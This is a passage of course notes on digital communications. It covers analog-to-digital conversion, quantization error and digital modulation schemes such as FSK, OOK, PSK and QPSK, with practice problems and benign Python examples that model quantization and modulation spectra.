TVs, the microphone you are singing into at Bancroft’s karaoke night…
So maybe you’re thinking, “I still have no idea what that stuff is!” There’s
probably a reason for that. We don’t really use many systems that are completely
analog anymore; digital communications are more widely used.
2. Digital Systems.
Let’s think for a second about comparisons between what was used in the past and what you use now:
Type of Information     Past Device              Present Device
Music                   Cassette Tape            CD
Videos                  VHS (VCR)                DVD/Blu-ray Disc
Broadcast Television    Standard Definition TV   High Definition TV (HDTV)
We want the same types of information but are using a different method to get them: digital systems. Digital systems use
electrical signals that represent discrete (often binary) values. The electrical signals are referred to as digital signals.
Specifically, binary baseband digital signals use two discrete voltage levels to represent binary 1 or 0 (bits), as shown in the
example plots below. Combining multiple bits into words permits us to represent more than just two things. Digital circuits
operate on digital signals, performing logic and arithmetic functions.
Interesting fact and important to the class: digital signals are not representative of signals that occur in nature. Natural
signals are analog, and must be converted into digital format to be used in a digital system.
Great! So we’re using a new method to get the same information. Is this a big deal? It is, because using digital systems
offers a number of advantages over using analog systems.
3. Digital Advantages.
1. Relative noise immunity. (What is the number one limiting factor in communications? Noise.)
Relative noise immunity is the most important advantage of digital communications.
Between the transmitter and receiver, whether the system is analog or digital, noise always corrupts the transmitted signal. In
general, an analog receiver has no idea what the received signal is supposed to be after it has been corrupted by noise, but a
digital receiver only has to decide between a finite set of choices: for example, a binary digital system’s receiver must only
decide at any time whether or not it is receiving a binary 0 or a binary 1. This means that receiver circuitry can be designed
to distinguish between a 0 and 1 even in the presence of a significant amount of noise. It is possible that the noise could be
severe enough that the receiver gets confused, and incorrectly decides it is receiving a 0 when it should be deciding a 1 (or
vice versa)…these are referred to as bit errors. But in general, digital systems are much better in noisy environments.
In long distance digital communications, digital signals can be stripped of any noise in a process called
signal regeneration. Consider a long distance transmission that incorporates a set of relay stations in
order for the signals to move from transmitter to receiver, as shown in the figure to the right. Relay
stations are needed because the farther a signal travels, the weaker it gets; to make it to its destination,
it must be amplified and retransmitted at the relay stations.
If this was an analog system, the analog signal is received, amplified and retransmitted at each station.
However, noise is now a part of the signal, and so is also amplified at each station.
In a digital communication system, a digital signal is received (receiver decides 0s or 1s), regenerated
(digital signal recreated based on the 0s and 1s), and then retransmitted at each station. With signal
regeneration, the noise can be eliminated at each station. This can only be done in digital
communication systems.
2. Error detection/correction. Digital signal processing (DSP) techniques allow the detection and
correction of bit errors. Even if a digital signal contains bit errors, many of these errors can be fixed at
the receiver through the use of error correcting codes. Error correcting codes allow, for example, CDs
with minor scratches to be played without errors. Analog systems cannot detect or correct errors.
3. Easier multiplexing. Multiplexing is the process of allowing multiple signals to share the same transmission channel. For
example, digital telephony allows carrying 24 phone conversations on a single wire (called a T1 line) at the same time.
Digital signal processing techniques enable this.
4. Easier to process and store. Since computers store and use digital data, digital signals can be easily processed by
computers. Similarly, the digital format lends itself to easier storage of communication signals (e.g., smaller storage
footprint). DSP allows operations such as filtering, equalization and mixing to be done in software without the use of analog
circuits. DSP also permits data compression (transforming signals so that fewer bits are needed to represent them). An
example of DSP would be Garage Band, for you musicians, or photo editing software like Adobe Photoshop, for those with a
knack for photography.
To emphasize this again, these advantages are huge. This is such a big deal that even though communication systems used to
be exclusively analog, it is worth the billions and even trillions of dollars that the government and private sector are spending
to migrate communication systems to digital.
4. Conversion from Analog to Digital (A/D)
If nature produces analog signals, how do we create digital signals from them? Before we can use digital transmission, we
must convert the signal of interest into a digital format. The natural signal (e.g., speech) that we want to transmit will be
acquired using an analog device. The analog signal will be translated into a digital signal using a method called analog-to-digital (A/D) conversion. The device used to perform this translation is known as an analog-to-digital converter or ADC.
Through A/D conversion, analog signals are changed into a sequence of binary numbers (encoded bits), from which the
digital signal is created by the transmitter. This process is depicted below.
There are two major steps involved in converting an analog signal to a digital signal represented by binary numbers: sampling,
and quantizing/encoding.
Steps for A/D conversion:
1. Sampling. This is a process of inspecting the value (voltage) of an analog signal at regular time intervals. The time
between samples is referred to as the sample period (T, in seconds), and the number of samples taken per second is referred to
as the sample frequency (fs, in samples/second or Hz). Basically, sampling is taking snap-shot values of the analog signal so
that you have an accurate representation of how the analog signal is changing over time.
The receiver must convert the bits it receives into sample values, and then recreate what it thinks the analog signal looks like
from the samples alone. As you might deduce from the figure below, when the samples are closer together (smaller sample
period, which means higher sample frequency), the analog signal is more accurately represented. Note that with the lower
sample rates, some of the fluctuations in the analog signal have no samples on them, so the samples are not a good
representation of the analog signal. How high does our sampling frequency fs need to be in order to accurately represent the
signal? That is, what is the minimum sample frequency for the A/D to work properly?
We could consider taking just a few samples (i.e., using a low sampling rate), which means less information to transmit to the
receiver. But if we choose that option, when we reconstruct the signal, it will likely be a terrible representation of the
original. The low sampling rate will only work well for very slowly changing (low frequency) signals. Alternatively, we
could choose the highest possible sampling rate known to man, to ensure that we can accurately capture even very fast signal
fluctuations. But the higher the sampling rate, the higher the cost of the equipment and more information must be transmitted.
In addition, if we decide to record the communications our saved files will be unnecessarily enormous.
But what is “low” and what is “high”? In other words, how exactly do I go about choosing my sampling rate? In order to
accurately reconstruct an analog signal from its samples, one must sample faster than the Nyquist sampling rate (also called
the Nyquist rate), fN, given by the formula
$f_N = 2 f_{max}$, where fmax is the highest frequency component of the analog signal.
That is, the sampling frequency must be more than twice the value of the highest frequency component of the signal:
$f_s > f_N$, where $f_N = 2 f_{max}$
If the sample rate is not greater than the Nyquist rate, a problem called aliasing results. We’ll talk more about aliasing in the
lab, but it can cause severe distortion of your signal.
The Nyquist sample rate is a floor on the sampling rate, and practical systems sample greater than the Nyquist rate. Some
examples of common sample rates are:
Signal    Signal frequency range    Standard Sample Rate
Voice     300 Hz-3 kHz              8 kHz
Music     0-20 kHz                  44.1 kHz (CD-quality)
Music     0-20 kHz                  192 kHz (DVD-quality)
Practice Problem 21.1
Consider the signal from the oboe depicted below in time and frequency domain representations.
What is the maximum frequency present in the oboe signal?
1. Based upon this, what sampling rate must be exceeded in order to accurately reconstruct the signal from its
samples?
[Figure: the oboe note; left panel Voltage (V) vs. Time (sec), 1.0 to 1.005 sec; right panel Voltage (V) vs. Frequency (Hz), 0 to 6000 Hz]
2. Quantizing/Encoding. Quantizating/encoding is the process of mapping the sampled analog voltage values to discrete
voltage levels, which are then represented by binary numbers (bits). This is needed because the analog sample values are real
numbers that occur on a continuum. That is, for example, if a sine wave of amplitude 1V is being sampled, the sample values
could be any value between -1V and +1V… an infinite number of possibilities. In any digital system, there is only a finite
amount of memory, so only a finite number of values can be used to represent the samples of the analog signal. Converting a
sample value from the set of infinite possibilities to one of a finite set of values is called quantization or quantizing. These
values are referred to as quantization levels.
Inputs to A/D converters are limited to a specific voltage range. For the sine wave example above, we assumed that all
values of the analog input fall within a range of -1.0 to +1.0 volts (note: this is the typical voltage range of voice or music
signals on a computer, such as in .wav or .mp3 files).
A/D systems are characterized by the number of bits they have available to perform quantization. The number of bits
determines the number of quantization levels. An N-bit A/D converter has 2^N quantization levels and outputs binary words of
length N (that is, it outputs N-bit values for every sample). For example, a 3-bit A/D system has 2^3 = 8 quantization levels, so
all samples of a 1V analog signal that is input to this A/D will be quantized into one of only 8 possible quantization levels
and each sample will be represented by a 3-bit digital word. In general, the A/D converter will partition a range of voltage
from some vmin to some vmax into 2^N voltage intervals, each of size q volts, where

$q = \frac{v_{max} - v_{min}}{2^N}.$

Some common examples of A/D quantizing are digital telephony, which uses 8-bit A/D (2^8 = 256 quantization levels), CD
audio, which uses 16-bit A/D (2^16 = 65,536 quantization levels), and DVD audio, which uses 24-bit A/D (2^24 = 16,777,216
quantization levels).
The following figures represent conceptually how a 3-bit A/D converter converts an analog signal into bits. In these figures,
the analog signal is shown as well as the samples, with samples taken every 0.5 msec (corresponding to a sample rate of fs =
1/0.0005 sec = 2000 samples/sec). The actual analog sample voltages are shown in parentheses next to the samples. Here, the
voltage range of the signal is divided into 2^3 = 8 smaller voltage intervals (also called steps). These are separated by the
dashed, bold horizontal lines, and each interval is 0.25V wide:

$q = \frac{v_{max} - v_{min}}{2^N} = \frac{1 - (-1)}{8} = 0.25\ \mathrm{V}.$

The value of q is more formally called the quantizer’s resolution.
Each of the voltage intervals is assigned an N-bit binary number representing the integers from 0 to 2^N − 1. For this
example, you can see that since we are using a 3-bit A/D, the intervals will be assigned binary numbers representing the
integers from 0 to 7 (that is, 000, 001, 010, …, 111), starting from the bottom of the voltage range. In this case, the digital
word 000 is assigned to the voltages from -0.75 V to -1.0 V, 001 is assigned to the voltages from -0.5 V to -0.74999 V…,
and so on. The figure that follows shows for each quantization interval the associated 3-bit digital word (on the left side of
the plot). Any analog sample that falls in a given voltage interval will result in those 3 bits being transmitted.
When a sample point falls within a given interval, it is assigned the corresponding binary word (this is the Encoding part of
Quantization/Encoding). For the first sample point at time 0, the voltage is 0.613 V, which means that sample is assigned a
binary value of 110. The A/D then creates a voltage signal that represents these bits, and that process continues as long as an
analog signal is input to it.
The binary representation of the above signal is:
110 101 100 011 011 100 110 110 100 010 000 000 001.
In this example, every sample produces 3 bits (that is, there are 3 bits/sample). The sample rate was 2000 samples/sec.
Multiplying these two values together results in the bit rate (Rb) produced from this A/D conversion:
$R_b = \frac{3\ \text{bits}}{\text{sample}} \times \frac{2000\ \text{samples}}{\text{sec}} = 6000\ \text{bits/sec (bps)}$
To the right of the plot above is the quantization level associated with each voltage interval. Any analog sample voltage that
falls in a given interval is effectively estimated to the center of its quantization level when it is desired to reconstruct the
analog signal from the received bits (a receiver may perform this). This process is referred to as Digital-to-Analog conversion
(D/A) and will be discussed briefly in the next section. For this example, the quantization level for the lowest voltage interval
is the value halfway between -.75 V and -1 V (which is -0.875 V). This means that any analog sample that fell into this range
will be represented as -0.875 V.
Alright, we’ve walked through an A/D example together; now it’s your turn.
Practice Problem 21.2
Consider the following analog waveform. This waveform is sampled at a 500 Hz rate and quantized with a 2-bit quantizer
(i.e., A/D converter). The input range is -1.0 to +1.0 V.
a. Circle the sample points (first sample is at time t = 0 sec).
b. Indicate the quantization intervals and corresponding digital words.
c. Indicate the digital word assigned to each sample point.
d. What is the stream of binary bits generated after the A/D conversion is complete?
e. What is the resulting bit rate from this A/D?
[Figure: analog waveform, Amplitude (volts) vs. time (msec)]
To give you an idea, here’s the effect of quantizing in a digital picture. Look at a color display of this picture (such as the pdf
file of the notes posted on the course website). See the difference?
4 bit = 16 colors
8 bit = 256 colors
Here is an example of a digital voltage waveform that might have been generated from an A/D process:
011100110111111110011001
This waveform could be transmitted from the transmitter to the receiver over a wire, but is not suitable to transmit wirelessly
through the atmosphere. We’ll get into more detail about how this is done in our next chapter on digital modulation.
5. Conversion from Digital to Analog (D/A)
But how do we recover the analog information after it has been converted to digital? As mentioned earlier, the receiver
converts these N-bit digital words back into an analog signal. This process is called digital-to-analog (D/A) conversion. It is
essentially the reverse of the analog-to-digital conversion process. The analog signal is reconstructed by converting
the N-bit digital words into the appropriate quantization levels, and this voltage is “held” for one sample period, creating a
stairstep-type signal shown below.
Good job. We’ve regenerated our original signal. How does it compare with the original? Let’s see. The reconstructed
analog signal for our 3-bit example is shown in a thick black line in the next figure, along with the 3-bit digital word that
represents each sample. The original analog signal is also shown in the continuous line, along with all of the sample points
that were on the earlier figures.
Is it close? It follows the same general shape. Even if we perform filtering to smooth out the reconstructed signal to remove
its staircase appearance (which is typical) it will still not quite be the same as the original red signal. Why? Is that the best we
can do?
6. Quantization Error.
There is always error introduced with the A/D process. The error is the difference between the original analog signal and the
reconstructed (stairstep) signal after A/D and D/A. The following figure is a portion of a music signal that has been quantized
with 3 bits. The upper plot shows the original analog signal along with the recovered analog signal from the A/D process. The
bottom plot is the quantization error, which is created by subtracting the recovered signal from the original analog signal at
each instance of time.
So is it bad? It can be. The quantization error manifests as noise in the reconstructed analog signal. For digital audio signals
(music or voice), it can sound like static. The greater the quantization noise, the louder the static, making it harder to hear the
voice or music. Reiterating what was presented in Chapter 19: NOISE IS THE NUMBER ONE LIMITING FACTOR IN
COMMUNICATION SYSTEMS. In this case, if quantization is part of the communication system (e.g., using a digital
communication system to transmit analog information), then the A/D process adds even more noise to the signal as it moves
from transmitter to receiver.
So how do we reduce the quantization error and its associated noise? Quantization error can be reduced by increasing the
number of bits N for each sample. This will make the quantization intervals smaller, reducing the difference between the
analog sample values and the quantization levels. The figure below is the same analog signal quantized with 4-bits per
sample. Note the step-size is smaller than in the 3-bit plot, (½ the size), and the noise signal is approximately ½ the
amplitude of what it was with 3-bit quantization. The reconstructed signal looks much closer to the original analog signal
compared to the 3-bit A/D. It is worth noting that increasing the sampling frequency will not reduce quantization noise; only
increasing the number of quantization levels will do this.
We of course can’t use an infinite number of bits, so some quantization noise is always inevitable, but the nice thing about
the human ear/brain - sticking with the example of audio signals - is that beyond a certain number of bits for each sample, the
associated quantization noise becomes imperceptible. We just need enough bits to make the recovered signal “good enough”
(e.g., the recovered music sounds “good enough”).
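To make the A/D, D/A and quantization-error ideas of sections 4 through 6 concrete, here is a short Python model. It is added to these notes as an example and is not part of the original course material. It assumes a uniform quantizer over the -1 V to +1 V input range, with the word 000… assigned to the lowest interval (the notes’ figures may label the intervals differently) and each quantization level placed at the midpoint of its interval, exactly as in the 3-bit example above (-0.875 V for the lowest interval). The sinusoid used as input is constructed for the demonstration.

```python
import math


def quantizer_step(n_bits, vmin=-1.0, vmax=1.0):
    """Resolution q: width of each of the 2^N equal quantization intervals."""
    return (vmax - vmin) / (2 ** n_bits)


def quantize(sample, n_bits, vmin=-1.0, vmax=1.0):
    """Return (N-bit digital word, quantization level in volts) for one sample.

    Interval k covers [vmin + k*q, vmin + (k+1)*q) and its level is the interval
    midpoint, as in the notes' 3-bit example. The word is k in offset binary
    (000... for the lowest interval); that assignment is an assumption made for
    this example. Samples at or beyond the range ends clip into the end
    intervals, which is what a real converter does.
    """
    q = quantizer_step(n_bits, vmin, vmax)
    k = math.floor((sample - vmin) / q)
    k = max(0, min(2 ** n_bits - 1, k))
    level = vmin + (k + 0.5) * q
    return format(k, f"0{n_bits}b"), level


def ad_convert(samples, n_bits, vmin=-1.0, vmax=1.0):
    """A/D: the N-bit words of all samples concatenated in time order."""
    return "".join(quantize(s, n_bits, vmin, vmax)[0] for s in samples)


def da_convert(bits, n_bits, vmin=-1.0, vmax=1.0):
    """D/A: each N-bit word back to its level. Holding every value for one
    sample period gives the stairstep signal of section 5."""
    q = quantizer_step(n_bits, vmin, vmax)
    words = [bits[i:i + n_bits] for i in range(0, len(bits), n_bits)]
    return [vmin + (int(w, 2) + 0.5) * q for w in words]


def bit_rate(sample_rate_hz, n_bits):
    """Bits per second leaving the A/D: N bits for each of the fs samples."""
    return sample_rate_hz * n_bits


def quantization_error(samples, n_bits, vmin=-1.0, vmax=1.0):
    """Original minus recovered sample: the error signal of section 6."""
    recovered = da_convert(ad_convert(samples, n_bits, vmin, vmax), n_bits, vmin, vmax)
    return [s - r for s, r in zip(samples, recovered)]


def max_abs_error(samples, n_bits, vmin=-1.0, vmax=1.0):
    """Largest error magnitude; never exceeds q/2 for in-range samples."""
    return max(abs(e) for e in quantization_error(samples, n_bits, vmin, vmax))


def sine_samples(freq_hz, sample_rate_hz, n_samples, amplitude=0.9):
    """Constructed test input: a sampled sinusoid kept inside the +/-1 V range."""
    return [amplitude * math.sin(2 * math.pi * freq_hz * k / sample_rate_hz)
            for k in range(n_samples)]


if __name__ == "__main__":
    print(quantize(-0.9, 3))            # lowest 3-bit interval, level -0.875 V
    print(bit_rate(8000, 8), "bps")     # 8-bit words at 8 kHz (illustrative numbers)
    wave = sine_samples(50, 1000, 40)
    for n in (3, 4, 5):
        print(n, "bits: max |error| =", max_abs_error(wave, n))
    # Four times the sample rate with the same 3 bits leaves the error bound unchanged
    print("3 bits at 4 kHz:", max_abs_error(sine_samples(50, 4000, 160), 3))
```

Run it and compare the 3-, 4- and 5-bit error bounds: each added bit halves q and therefore halves the worst-case error, while quadrupling the sample rate leaves it unchanged, just as stated above. One caveat a designer has to keep in mind: a sample outside the input range clips to the end interval, so the q/2 error bound only holds for signals kept inside the converter’s range.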
Problems
1.
What is the greatest advantage that digital communication has over analog communication?
2.
Describe the function of a regenerative repeater.
3.
What is the cause of aliasing in the A/D process?
4.
Why does a 5-bit quantizer produce a better approximation to an analog signal than a 3-bit quantizer?
5.
A music signal has frequency content from 0 Hz up to 18.75 kHz. What sampling frequency must be exceeded for
successful A/D conversion? What is another name for the minimum sampling frequency?
6. Consider the following analog waveform. This waveform is to be sampled at a 1-kHz rate and quantized with a 3-bit quantizer (input voltage range is -1.0 to +1.0 V).
a. What is the resolution (q) of this quantizer?
b. Circle the sample points on the analog waveform below.
c. Indicate the quantization intervals and corresponding digital words.
d. Indicate the digital word assigned to each sample point.
e. When a receiver receives the transmitted bits, D/A is used to recover the analog signal, but the recovered signal is not the same as the original analog signal. What is the term to describe this difference and what can be done to minimize this difference?
[Figure: analog waveform for Problem 6; Voltage (V) from -1.000 to 1.000 vs. Time (ms) from 0 to 8]
7. Consider the following analog waveform. This waveform is to be sampled at a 1.333333 MHz rate and quantized with a 3-bit quantizer (input voltage range is -2.0 to +2.0 V).
a. What is the resolution (q) of this quantizer?
b. Circle the sample points on the analog waveform below.
c. Indicate the quantization intervals and corresponding digital words.
d. Indicate the digital word assigned to each sample point.
[Figure: analog waveform for Problem 7; amplitude (V) from -2 to 2 vs. time (microsec) from 0 to 5]
Chapter 22: Digital Modulation
Objectives:
(a) Quantitatively describe the relationship between a symbol and a bit and the bit rate and the baud.
(b) Describe how digital information is conveyed using various digital modulation techniques (ASK or OOK, FSK, PSK and
QAM) and recognize their waveforms, and constellations.
(c) Calculate the bandwidth of an ASK, FSK, PSK, or QAM signal.
(d) Using a constellation diagram analyze a M-ary PSK signal to determine its symbols and bits per symbols.
(e) Discuss the effect of noise on M-ary PSK and how Quadrature Amplitude Modulation (QAM) overcomes these detrimental
effects.
1. Digital Signal Frequency Spectrum
In Chapter 21, it was mentioned that in many cases, we wished to convert analog signals into digital signals to take advantage
of the benefits of digital technologies. Samples of the analog signal were converted into bits and the bits were then used to
create a binary voltage waveform that represented the bits. If we then wanted to transmit this digital waveform through free
space, then all we need to do is connect it to an antenna, right?
No, it is not that easy. The binary voltage waveforms to which we are so accustomed are, typically, voltage pulses that
alternate between 0 V (for a 0-bit) and 5 V (for a 1-bit). It just so happens that the preponderance of frequency content in
these voltage pulses is very low (a baseband signal), and just as was pointed out for voice signals (which also have low
frequency content), an antenna needed to transmit this kind of signal through free space would be impractically large.
For a large number of random voltage pulses, the frequency plot would look something like the following, where Rb is the
value of the bit rate in Hz.
For example, if the bit rate were 500 bps, then the frequency content magnitude would be equal to zero at 500 Hz, 1000 Hz,
etc. This plot of frequency content is much different than that of a signal composed of sinusoids! There are no spikes!
Nevertheless, most of the frequency content is at very low frequencies. The frequency content does continue out to an infinite
frequency, although the magnitude drops dramatically at higher frequencies. In a perfect world, we’d say the bandwidth of
voltage pulses approaches ∞ Hz, but for digital signals, we’ll use the null-bandwidth as our calculated bandwidth. The null-bandwidth is defined as the amount of the frequency spectrum (in Hz) from the maximum magnitude (which occurs at 0 Hz)
to where the spectrum first goes to a magnitude of 0 (called a null, here at Rb Hz). The bandwidth is given by:
BW = f2 - f1 = Rb - 0 = Rb Hz.
We must come up with a method to transmit the digital information (1s and 0s) using radio waves. Digital modulation
techniques allow this. As you recall, the goal of modulation is to upshift the frequency spectrum of the information signal to
allow transmission through free space; the transmitted signal’s frequency spectrum would then look like the following.
Recall that, like in analog amplitude modulation, the information signal’s frequency spectrum is shifted up by fc Hz, and there
is a mirror image of the frequency content on the left side of fc. The transmission bandwidth (using the null-bandwidth
definition) is now
BW = f2 - f1 = ( fc + Rb ) - ( fc - Rb ) = 2Rb Hz
2. Binary Digital Modulation
Recall the equation for a high frequency carrier: vc(t)=Vc sin(2πfct + θ). As discussed in Chapter 20, a sinusoidal carrier can
be modulated by varying its amplitude, frequency, or phase using an information signal. So, how do we go about representing
1s and 0s with modulation? Just as we can vary amplitude, frequency, and phase of a high-frequency carrier in accordance
with an analog waveform, we can do the same with a digital waveform. Since bit values shift between 0s and 1s, digital
modulation techniques that vary the carrier’s amplitude, frequency, and phase are referred to as “shift keying.”
Frequency Shift Keying (FSK)
Frequency-shift keying (FSK) is a frequency modulation scheme in which digital information is transmitted through discrete
frequency changes (shifts) of a carrier wave. The simplest form of FSK is Binary FSK (BFSK), in which a carrier’s
frequency is shifted to a low frequency or a high frequency to transmit 0s and 1s. The plot below shows a sample FSK signal
along with the associated bits.
An example of how FSK was used “back in the day” was with dial-up modems to connect your home computer to your
Internet service provider over your analog phone. With a modem, a 0-bit was represented with a lower frequency carrier of
1070 Hz and a 1-bit was represented with a higher carrier frequency of 1270 Hz. The lower frequency, binary 0, was called
the “space” frequency while the higher frequency, binary 1, was called the “mark” frequency. The terms mark/space were a
throwback to the days of Morse code or flashing light communications.
In the frequency domain, we consider FSK to be two different digital transmissions, one at the mark frequency (the higher
frequency) and one at the space frequency (lower frequency). The resulting frequency plot would look like the following,
with the carrier frequency being shifted between the mark and space frequencies.
The amount that the carrier frequency can be shifted is called the frequency deviation (Δf). To determine the bandwidth for
FSK modulation, we take a closer look at the frequency spectrum around the mark and space frequencies. We use the null-bandwidth definition to compute the bandwidth as shown below.
In the figure, the bandwidth effectively runs from the first null to the left of fspace to the first null to the right of fmark.
Mathematically, there are two equations that can be used to compute the bandwidth:
BW = ( fmark + Rb ) - ( fspace - Rb ) = fmark - fspace + 2Rb
or
BW = 2(Δf + Rb )
Practice Problem 22.1
You have an FSK transmitter using a carrier of 500 kHz sending 10 kbps and a frequency deviation of 100 kHz. How much
bandwidth do you need for your transmission?
Of course, who still uses dial-up? What else is there?
Amplitude Shift Keying (ASK) and On-Off Keying (OOK)
Amplitude Shift Keying is a form of amplitude modulation that represents digital data as shifts in the amplitude of a carrier
wave: for example, small amplitude for a 0-bit, and larger amplitude for a 1-bit. We have seen what an ASK signal has
looked like before in Chapter 21, repeated below.
The simplest digital modulation scheme is a form of ASK called on-off keying (OOK). This is analogous to Morse code. In
OOK, a carrier is transmitted for a 1-bit and nothing is transmitted for a 0-bit; this is the same as saying that the smaller ASK
amplitude is 0.
Note that in all forms of ASK, the frequency and phase of the carrier are the same for all outputs; it is the amplitude that
changes.
Practice Problem 22.2
Sketch an OOK signal that represents the bit stream below.
1 0 0 0 1 1
Before we continue, you need to learn some important terms that are used in digital communication systems. The information is
carried in the bits that are transmitted, but we don’t actually transmit bits; we transmit waveforms that represent bits. These
waveforms are commonly referred to as symbols. On a wire, the symbols take the form of voltage pulses. In FSK and OOK,
the symbols take the form of a high frequency carrier that has its frequency or amplitude altered based on whether a 0-bit or a
1-bit is being transmitted. In these modulation schemes, the number of symbols that can be transmitted (M) is two (M = 2)
and each symbol represents one bit of data. For FSK and OOK, the time duration of a bit is the same as the time duration of a
symbol (Tb = Tsym).
We will soon see other digital modulation schemes where a symbol can represent more than one bit. In general, the number
of symbols for a modulation type is related to the number of bits associated with each symbol. If N is the number of bits per
symbol,
M = 2^N and N = log2 M.
The relationship between bits and symbols for an OOK signal is shown in the next figure.
Bitrate (Rb) is the speed of transfer of data (number of bits per second). Bitrate is inversely related to bit duration
(Tb), which is the time required to transmit a single bit.
Rb = 1 / Tb
Baud (also referred to as Symbol Rate) (Rsym) is the number of symbols transmitted per second, and is inversely
related to the Symbol duration (Tsym), which is the time required to transmit one symbol.
Rsym = 1 / Tsym
The Bitrate and the Baud (or Symbol Rate) are related by the number of bits per symbol (N).
Rb = Rsym × N (Rsym is also written Rs below)
The bandwidth associated with OOK is what we have seen before, BW = 2Rb, as shown in the figure below.
As you’ll see shortly, the symbol rate (Rs) has a noted effect on the bandwidth required for transmission. In general, for all
digital modulation schemes that we will discuss (except for FSK), bandwidth is given by:
BW = 2Rb / N.
In the case of OOK, since N = 1 bits/symbol, BW = 2Rb = 2Rs, as stated before. For example, for OOK, if the bitrate is 600
kbps, the symbol rate is 600,000 symbols/sec, and the bandwidth is 2(600,000) = 1.2 MHz.
Phase Shift Keying (PSK)
Phase shift keying (PSK) is a form of phase modulation where the carrier’s phase shifts to one of a finite set of possible
phases based on the bits that are input. For binary phase shift keying (BPSK), the carrier phase is shifted between one of two
phases (typically 0 and 180) depending on whether a 0-bit or a 1-bit is being transmitted. For example:
0-bit: the symbol transmitted is Vc sin(2π fc t).
1-bit: the symbol transmitted is Vc sin(2π fc t + 180°) = -Vc sin(2π fc t).
It is important to point out that in PSK, the amplitude of all output symbols is the same; it is the phase of the output symbols
that are different.
Up to this point we have discussed digital modulation with one bit per symbol, which means that at any time, one of two
possible symbols would be transmitted. But as mentioned earlier, it is possible to have a modulation scheme with more than
one bit per symbol; this is referred to as M-ary digital modulation.
3. M-ary Digital Modulation
Before launching into more complicated digital modulation, we’ll introduce a graphical way to relate output symbols to the
bits they represent. This is called a constellation diagram. A constellation is a plot of relative amplitude and phase of the
output symbols for a digital modulation system. Each dot describes a symbol which is represented by its polar coordinates. In
terms of phase, 0° is along the positive x-axis, and phase increases as you move counterclockwise around the x-y plane.
Relative amplitude is measured as distance from the origin of the plot. The possible output symbols are represented with
filled-in circles, and adjacent to them are the bits they represent.
For example, here are two possible BPSK systems’ constellation diagrams. In BPSK, the output symbols both have the same
amplitude (both of the symbols are equidistant from the origin), but their phases are 180° apart. There are other possible
combinations of two carrier phases that might be used (such as +90° and -90°), but the actual constellation used is not
important, as long as the transmitter and receiver use the same constellation.
Note that BPSK transmits 1 bit per symbol, so only one bit value is placed next to each symbol.
If it is desired to get the information from the transmitter to the receiver faster, we need to increase the number of bits per
second (bps) that are transmitted. The cost of increasing the bitrate (besides requiring more complex components) is that it
increases the transmission bandwidth: recall that for OOK BW = 2Rb, and from Chapter 19, that bandwidth can be expensive!
Is there a way to transmit a higher bitrate but using a smaller transmission bandwidth? The answer is yes, using M-ary digital
modulation.
In M-ary modulation, we can preserve bandwidth if we keep the symbol rate the same and increase the number of bits per
symbol. For example, instead of transmitting just 2 possible phase shifts (0˚and 180˚), we could transmit one of 4 possible
phase shifts per symbol. This is called quadrature phase shift keying (QPSK).
Quadrature Phase Shift Keying (QPSK)
In QPSK, there are 4 symbols (M = 4) and there are 2 bits per symbol (N = 2 = log2 M). Two of the many possible
constellation diagrams for QPSK are shown in the following figure, and the four symbols from QPSK Constellation #2 are
shown to the right of this constellation. The carrier with a phase of 0˚ is plotted in a dashed red line with each symbol for
reference. The four symbols in the right-hand constellation are:
sin(2π fc t + 45°), sin(2π fc t + 135°), sin(2π fc t - 135°), and sin(2π fc t - 45°).
The following figure is a plot of the use of QPSK constellation #2 to transmit the bit stream 0001111000110110. Also shown
is the bit duration, and the symbol duration for QPSK.
The frequency spectrum for M-ary modulation schemes is shown in the figure below, which also specifies the frequency axis
for QPSK. If the bitrate is constant, the benefit of transmitting more than one bit in a symbol can be seen in the fact that the
nulls are closer to the carrier frequency.
From the figure, it is seen that the bandwidth for QPSK is given by
BW = ( fc + Rb/2 ) - ( fc - Rb/2 ) = Rb Hz.
This is confirmed by the equation for bandwidth for all digital modulation schemes (except for FSK),
BW = 2Rb / N
where N = 2 for QPSK. For example, if bitrate is 600 kbps, BW = 2(600,000)/2 = 600 kHz.
M-ary PSK
We can further increase the number of bits per symbol by increasing the number of
possible phase shifts. The M in M-ary refers to the number of symbols. Consider
the 8-PSK constellation to the right (one of many possible 8-PSK constellations).
How many bits per symbol are transmitted? There are 8 symbols (M = 8), so N =
log2M = log28 = 3 bits/symbol. This is also evident from the diagram because the
three bits associated with each symbol appears next to the symbol.
What is the bandwidth for 8-PSK? Since N = 3 bits/symbol, bandwidth is given by
BW = 2Rb / N = 2Rb / 3.
For example, if the bitrate is 600 kbps, bandwidth for 8-PSK is BW = 2(600,000)/3 = 400 kHz.
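The null-bandwidth argument of section 1 and the BW = 2Rb/N rule applied to OOK, QPSK and 8-PSK above can be checked numerically rather than taken on faith. The Python below is an added example and is not part of the original notes. It builds a symbol waveform from the 24-bit A/D output stream shown in Chapter 21, holds each N-bit word for N bit periods (a one-bit-per-symbol OOK-style waveform, and an 8-level, three-bits-per-symbol amplitude waveform), multiplies it by a carrier, and then walks a plain DFT outward from the carrier to the first spectral null on each side. The time resolution (8 samples per bit) and the carrier placement (two bit-rates above 0 Hz) are choices made for the example; amplitude levels are used for the M-ary case because the null positions depend only on the symbol duration, not on which carrier parameter is keyed.

```python
import cmath
import math

# The 24-bit A/D output stream shown in Chapter 21, section 4, used as the data.
BITS = "011100110111111110011001"
SAMPLES_PER_BIT = 8  # time resolution of the simulated waveform (a choice)


def symbol_waveform(bits, bits_per_symbol, samples_per_bit=SAMPLES_PER_BIT):
    """Baseband symbol pulses: each N-bit word (read as an integer 0..2^N-1) is
    held for N*samples_per_bit samples, so Tsym = N*Tb. N = 1 gives the 0 V / 1 V
    pulses of section 1 (scaled from 0 V / 5 V; scaling does not move nulls);
    N = 3 is an 8-level, 3-bits-per-symbol amplitude waveform."""
    n = bits_per_symbol
    words = [int(bits[i:i + n], 2) for i in range(0, len(bits), n)]
    return [float(w) for w in words for _ in range(n * samples_per_bit)]


def modulate(baseband, carrier_cycles):
    """Multiply by a carrier completing carrier_cycles cycles in the window,
    so the carrier sits exactly on DFT bin carrier_cycles."""
    n = len(baseband)
    return [v * math.cos(2 * math.pi * carrier_cycles * t / n)
            for t, v in enumerate(baseband)]


def dft_magnitude(x):
    """Magnitude spectrum by a plain O(N^2) DFT; bin k is f = k*fs/N."""
    n = len(x)
    return [abs(sum(x[t] * cmath.exp(-2j * math.pi * k * t / n) for t in range(n)))
            for k in range(n)]


def first_null(mag, start, step):
    """Walk from bin `start` in direction `step` to the first bin whose
    magnitude is zero up to floating-point round-off."""
    eps = 1e-9 * max(mag)
    k = start + step
    while 0 <= k < len(mag):
        if mag[k] < eps:
            return k
        k += step
    raise ValueError("no null found")


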